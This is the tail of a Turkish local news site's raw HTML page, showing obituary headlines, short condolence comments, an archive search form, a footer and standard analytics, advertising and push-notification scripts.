src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/ali_katkaya_88_yasinda_h68727_9f3e7.jpg" alt="Ali Katkaya 88 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ali-katkaya-88-yasinda-h68727.html" title="" ><span class="en-hit">4.</span> <strong>Ali Katkaya 88 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/nuri-cingil-80-yasinda-h68555.html" title="Nuri Cıngıl 80 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/nuri_cingil_80_yasinda_h68555_ffa22.jpg" alt="Nuri Cıngıl 80 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/nuri-cingil-80-yasinda-h68555.html" title="" ><span class="en-hit">5.</span> <strong>Nuri Cıngıl 80 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html#comment_334589" title="" >Kıymetli öğretmenim, müdürüm, değerli...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/haci-dilki-80-yasinda-h68808.html#comment_334586" title="" >Allah rahmet eylesin mekanı cennet başınız...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/harun-mihci-51-yasinda-h68815.html#comment_334585" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/harun-mihci-51-yasinda-h68815.html#comment_334584" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/harun-mihci-51-yasinda-h68815.html#comment_334583" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/harun-mihci-51-yasinda-h68815.html#comment_334582" title="" >Başımız sagolsun Allah rahmet eylesin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html#comment_334581" title="" >BABA ARKADAŞI ÖĞRETMENİME ALLAHTAN RAHMET...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/harun-mihci-51-yasinda-h68815.html#comment_334580" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/harun-mihci-51-yasinda-h68815.html#comment_334579" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mustafa-kara-h68811.html#comment_334577" title="" >ALLAH cc RAHMET EYLESİN MEKANI CENNET OLSUN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html#comment_334576" title="" >Gazipaşa ilköğretim okulundan hem öğretmenim...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html#comment_334575" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html#comment_334574" title="" >Allah rahmet eylesin mekanın cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html#comment_334573" title="" >Çok değerli Hocama Allah&#39;tan rahmet.yakinlarina...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sultan-cetin-90-yasinda-h68809.html#comment_334572" title="" >Allah rahmet eylesin mekanı cennet olsun.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html#comment_334571" title="" >Allah rahmet eylesin</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mustafa-kara-h68811.html#comment_334570" title="" >Allah rahmet eylesin mekanı cennet olsun.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fethi-celenk-76-yasinda-h68794.html#comment_334569" title="" >Değerli hocama Allah&#39;tan rahmet yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mustafa-kara-h68811.html#comment_334568" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/basaksehirin-belediye-baskani-yasin-kartoglu-oldu-h47261.html#comment_334567" title="" >Erzak yardimi almak istiyorum yeşil kartliyim...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" selected>29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" selected>Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="https://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="https://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Ahmet Kirik 74 yaşında" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="06636a646f757267686f687563756f61677c637263756f46616b676f6a2865696b">[email&#160;protected]</a> <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fahmet-kirik-74-yasinda-h68826.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('68826', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 